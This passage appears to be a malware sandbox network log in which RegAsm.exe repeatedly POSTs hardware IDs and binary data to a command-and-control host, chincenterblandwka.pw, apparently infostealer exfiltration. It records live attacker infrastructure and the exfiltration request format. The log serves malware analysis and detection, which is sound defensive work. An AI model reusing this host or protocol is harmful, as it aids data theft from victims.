63 4a 56 58 5a 41 76 35 67 4f 39 79 52 63 76 2b 2f 6e 36 73 33 41 52 4c 53 31 34 30 37 4c 6c 50 42 73 59 79 Data Ascii: Wzm1v4m1jIBR6nGqzsE2riQGcC9SwZZO1Wm+wJBjHtcbqeIsGuVdmMh+YDvckWW8tdRw68GURBxe7T2C1OVRV1g987TDpd6Tgv5gLJ+bLvY/lOGrilhEHMe7LlPBsYwXWzm1v4m0TIMRLHJojMA2rCYG9a/RglcN12i/gxIh2JWZquItHSVdmMh+YDvckWW8tdRw68GURBxfKX3DkiFd29jqIC7cJVXZAv5gO9yRcv+/n6s3ARLS1407LlPBsYy
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 6a 38 43 62 31 36 54 67 76 35 67 4f 38 76 53 62 76 59 31 31 4f 47 39 51 52 4c 53 31 34 30 37 4c 6c 50 42 73 59 79 47 43 4c 6d 69 62 41 6d 6a 58 70 4d 53 4c 66 4e 72 6a 38 45 31 37 47 66 41 39 61 37 54 77 46 58 50 56 65 67 2f 52 39 43 69 33 6c 5a 59 36 2b 4a 74 47 72 66 4f 77 73 4a 39 61 33 46 63 6b 57 57 38 74 64 54 68 76 55 47 44 6b 70 78 42 4f 79 37 4c 6c 4f 55 66 52 6f 50 7a 73 7a 2b 4a 4a 64 36 54 6c 62 31 72 63 56 79 52 5a 62 79 31 31 50 64 32 43 35 4c 45 48 4d 65 37 4c 6c 50 42 73 52 33 56 69 44 2b 7a 50 78 75 32 44 41 47 54 62 7a 50 71 6a 59 4f 78 72 6d 51 48 38 53 7a 54 51 5a 55 4e 56 2b 75 36 51 74 41 6a 48 4e 58 62 61 69 4e 75 43 61 62 56 32 51 4c 2b 59 44 76 63 6b 57 57 38 74 55 57 33 50 63 65 53 78 49 44 55 61 44 67 41 6b 4f 56 65 68 6f 50 7a Data Ascii: j8Cb16Tgv5gO8vSbvY11OG9QRLS1407LlPBsYyGCLmibAmjXpMSLfNrj8E17GfA9a7TwFXPVeg/R9Ci3lZY6+JtGrfOwsJ9a3FckWW8tdThvUGDkpxBOy7LlOUfRoPzsz+JJd6Tlb1rcVyRZby11Pd2C5LEHMe7LlPBsR3ViD+zPxu2DAGTbzPqjYOxrmQH8SzTQZUNV+u6QtAjHNXbaiNuCabV2QL+YDvckWW8tUW3PceSxIDUaDgAkOVehoPz
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 53 49 45 77 52 2b 59 4b 42 4d 78 62 65 38 72 49 4c 30 72 42 4b 47 46 6b 38 55 4f 36 55 5a 51 62 47 4d 68 67 69 35 4a 48 79 43 62 31 36 54 67 76 35 67 4f 38 70 61 4c 7a 79 31 31 4f 47 39 51 52 4c 45 48 46 62 6f 72 74 56 42 73 52 77 57 32 32 30 69 37 31 73 33 7a 55 45 52 72 37 48 6f 6a 51 44 33 37 36 48 48 38 75 33 51 41 4a 54 4e 46 2b 6c 38 51 4e 4e 6c 6a 41 55 44 38 37 4d 2f 69 53 58 65 6b 34 4c 2b 59 4b 71 4b 45 65 4d 38 74 55 37 33 37 5a 4c 42 52 41 66 56 37 6a 38 54 32 57 4b 65 31 31 73 73 4d 37 54 44 70 64 36 54 67 76 35 67 4c 4a 2b 61 4c 7a 79 31 31 4f 47 39 51 51 51 50 56 6b 65 37 4c 6c 50 42 73 59 79 47 43 43 68 67 76 77 2b 6c 33 67 46 52 37 66 42 71 6a 67 50 30 62 43 65 45 63 75 39 53 41 35 41 4f 31 43 6b 36 51 4a 48 69 58 52 58 61 71 4f 48 72 6d Data Ascii: SIEwR+YKBMxbe8rIL0rBKGFk8UO6UZQbGMhgi5JHyCb16Tgv5gO8paLzy11OG9QRLEHFbortVBsRwW220i71s3zUERr7HojQD376HH8u3QAJTNF+l8QNNljAUD87M/iSXek4L+YKqKEeM8tU737ZLBRAfV7j8T2WKe11ssM7TDpd6Tgv5gLJ+aLzy11OG9QQQPVke7LlPBsYyGCChgvw+l3gFR7fBqjgP0bCeEcu9SA5AO1Ck6QJHiXRXaqOHrm
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 52 36 6e 44 70 7a 77 47 30 37 65 65 41 38 2b 6c 54 51 46 52 50 31 53 6e 2b 77 4e 45 68 58 31 61 49 4f 6a 68 31 43 53 58 65 6b 34 4c 2b 59 44 76 63 41 44 4d 38 4d 31 54 68 4a 4a 6c 48 6b 51 37 48 6f 33 73 47 30 36 44 66 45 78 72 70 34 32 71 61 38 56 34 59 79 48 35 67 4f 39 79 52 5a 61 76 32 33 36 73 39 51 52 4c 45 48 4d 65 74 35 52 6c 42 73 59 79 47 43 4c 6b 7a 50 34 6d 30 6a 52 4d 45 66 6d 43 70 6a 38 4a 32 62 75 52 47 4d 47 2f 52 51 78 58 4f 31 43 69 2b 67 56 4e 6a 6e 56 66 5a 71 79 4e 73 6d 6e 55 4e 41 68 41 74 63 76 74 66 6d 69 38 38 74 64 54 68 76 55 45 53 78 42 78 57 37 61 37 56 51 62 45 52 6b 70 6e 76 6f 4f 73 4a 4f 63 37 48 56 69 75 7a 37 30 32 52 66 75 7a 6d 52 4c 42 73 46 5a 4a 50 56 6b 65 37 4c 6c 50 42 73 5a 76 46 41 2f 4f 7a 50 34 6b 6c 33 70 Data Ascii: R6nDpzwG07eeA8+lTQFRP1Sn+wNEhX1aIOjh1CSXek4L+YDvcADM8M1ThJJlHkQ7Ho3sG06DfExrp42qa8V4YyH5gO9yRZav236s9QRLEHMet5RlBsYyGCLkzP4m0jRMEfmCpj8J2buRGMG/RQxXO1Ci+gVNjnVfZqyNsmnUNAhAtcvtfmi88tdThvUESxBxW7a7VQbERkpnvoOsJOc7HViuz702RfuzmRLBsFZJPVke7LlPBsZvFA/OzP4kl3p
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 49 4d 33 41 64 47 33 68 56 50 71 76 46 49 4f 45 6e 38 7a 78 72 6c 50 42 73 59 79 47 43 4c 6b 7a 72 4d 6d 6a 58 6f 31 43 66 4f 43 6b 6e 35 6f 76 50 4c 58 55 34 62 31 42 45 73 51 63 55 54 75 6f 30 38 45 73 58 4e 55 62 71 47 59 72 53 76 37 50 77 70 4d 76 4e 4c 76 48 67 7a 41 74 39 56 66 71 39 38 45 53 78 42 7a 48 75 79 35 54 77 53 43 4d 41 49 69 39 73 44 54 44 70 64 36 54 67 76 35 67 4f 39 79 52 39 43 68 31 55 6d 47 35 78 52 53 42 32 49 4c 2f 71 6c 69 4c 4d 59 79 47 43 4c 6b 7a 4b 4d 6f 75 6c 42 4f 43 2f 6d 41 37 33 49 65 75 39 6a 58 55 34 62 31 42 45 73 51 63 78 79 34 75 31 55 47 31 6a 34 31 43 4f 54 4d 2f 69 53 58 65 6b 34 4c 2b 39 44 74 61 45 57 55 39 35 59 44 31 72 46 46 48 31 46 32 59 70 44 34 47 30 6d 4c 65 31 74 65 6d 4b 43 78 5a 39 59 32 54 6e 69 74 Data Ascii: IM3AdG3hVPqvFIOEn8zxrlPBsYyGCLkzrMmjXo1CfOCkn5ovPLXU4b1BEsQcUTuo08EsXNUbqGYrSv7PwpMvNLvHgzAt9Vfq98ESxBzHuy5TwSCMAIi9sDTDpd6Tgv5gO9yR9Ch1UmG5xRSB2IL/qliLMYyGCLkzKMoulBOC/mA73Ieu9jXU4b1BEsQcxy4u1UG1j41COTM/iSXek4L+9DtaEWU95YD1rFFH1F2YpD4G0mLe1temKCxZ9Y2Tnit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:44 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 641 Host: chincenterblandwka.pw
2023-12-27 16:57:44 UTC	641	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:44 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2bh7nrbji11ceucbq81nnetpi6; expires=Sun, 21-Apr-2024 10:44:23 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Py4kNfKAV72gnHhfclr4E%2BfRhkg8yeqdCyFNgtB%2FajB6S5x5mgXkH6RVSR0i%2Bkb46DBM0BgGhqUMVovmEcd1h%2FRkh5PWov87CfLJ7r1Jk54J5f8fGf7zqa687zaUmFF63U1j7thmbxI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ab3c9544656-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:44 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:57:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:47 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19507 Host: chincenterblandwka.pw
2023-12-27 16:57:47 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:47 UTC	4176	OUT	Data Raw: 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa Data Ascii: A~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2023-12-27 16:57:48 UTC	1335	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vbkdiskqg1kl6417qf2erfoa1a; expires=Sun, 21-Apr-2024 10:44:27 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=icluRP8FS2Lub%2F4SYSd7lXWQfO4LHJ3vtLzz%2Bsnmv0mTzeHuz3%2Bnrx4iA81QH3Xzk8atS7MrHIobEqdPaxQ9r6FnJbUSWIvsOPoA7k%2FhfdCIBRcNSkx%2FUm%2FUaBkzyTxK0uDE%2FoFRJ8A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31aca69ef6c0d-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:57:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:49 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 9617 Host: chincenterblandwka.pw
2023-12-27 16:57:49 UTC	9617	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:49 UTC	1327	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nc8cvi9n1okr5bf7abrmrmhcsu; expires=Sun, 21-Apr-2024 10:44:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mARn%2FiRaXirvd7rE66WCTgaqZfzJlqqpfKScAoH%2BhaBuwpwDtjvG9ncqPMw6pW64G149Tdsz4Wj5pwt168K8aCrRJKzKEKJCBxRnFrHqlfXXjDArg9UBvhRaC%2FY357V9Nc15rZK9qrY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ad40d3b2cb1-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:49 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:57:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:50 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20443 Host: chincenterblandwka.pw
2023-12-27 16:57:50 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:50 UTC	5112	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2023-12-27 16:57:51 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tuaot11i5ohs8s39fch39u36k5; expires=Sun, 21-Apr-2024 10:44:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SFKLngJ2QYkwW7P1ElV5NCgedSdgdxacyfx%2B1Db9g%2BbLxSKt2PI8i3Unfthn9Jz1DaoSpbFRAGPZ8pU%2FU0U8%2BcRZoZADf2LfBNyitTC0q6laXP16LI%2F67WCIs57%2B4mYi0udU84GijeM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31adc6d6b2d47-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:57:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:51 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 3761 Host: chincenterblandwka.pw
2023-12-27 16:57:51 UTC	3761	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:52 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ho8bb2k2fha1625eotamcelpek; expires=Sun, 21-Apr-2024 10:44:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: 